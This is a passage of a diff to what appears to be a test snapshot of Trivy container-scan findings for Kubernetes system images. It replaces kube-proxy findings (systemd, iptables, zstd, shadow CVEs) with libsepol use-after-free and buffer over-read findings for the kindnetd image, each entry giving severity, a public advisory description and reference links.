"https://www.cve.org/CVERecord?id=CVE-2021-36084", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://avd.aquasec.com/nvd/cve-2021-36084", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "https://access.redhat.com/security/cve/CVE-2021-36084", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36085", + "installedVersion": "2.8-1", + "packageName": "libsepol1", "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "https://access.redhat.com/security/cve/CVE-2021-36085", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "https://linux.oracle.com/cve/CVE-2021-36085.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36085", ], }, "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", - }, - { - "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://avd.aquasec.com/nvd/cve-2021-36085", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://access.redhat.com/security/cve/CVE-2021-36085", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "247.3-7", - "packageName": "libudev1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", - ], - }, - "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", }, ], "severity": "LOW", @@ -84888,148 +86177,122 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "libxtables12", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36086", + "installedVersion": "2.8-1", + "packageName": "libsepol1", "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "https://access.redhat.com/security/cve/CVE-2021-36086", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "https://linux.oracle.com/cve/CVE-2021-36086.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36086", ], }, "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "name": "use-after-free in cil_reset_classpermission()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://avd.aquasec.com/nvd/cve-2021-36086", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-36086", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4899", - "installedVersion": "1.4.8+dfsg-2.1", - "packageName": "libzstd1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-4899", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", - "https://github.com/facebook/zstd/issues/3200", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", - "https://www.cve.org/CVERecord?id=CVE-2022-4899", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "buffer overrun in util.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4899", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4899", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://github.com/facebook/zstd/issues/3200", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.8.1-1", - "packageName": "login", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", }, ], "severity": "LOW", @@ -85037,1256 +86300,1082 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.8.1-1", - "packageName": "login", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36087", + "installedVersion": "2.8-1", + "packageName": "libsepol1", "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "https://access.redhat.com/security/cve/CVE-2021-36087", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "https://linux.oracle.com/cve/CVE-2021-36087.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36087", ], }, "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", - }, - { - "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://avd.aquasec.com/nvd/cve-2021-36087", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://access.redhat.com/security/cve/CVE-2021-36087", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.8.1-1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", - ], - }, - "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.8.1-1", - "packageName": "login", + 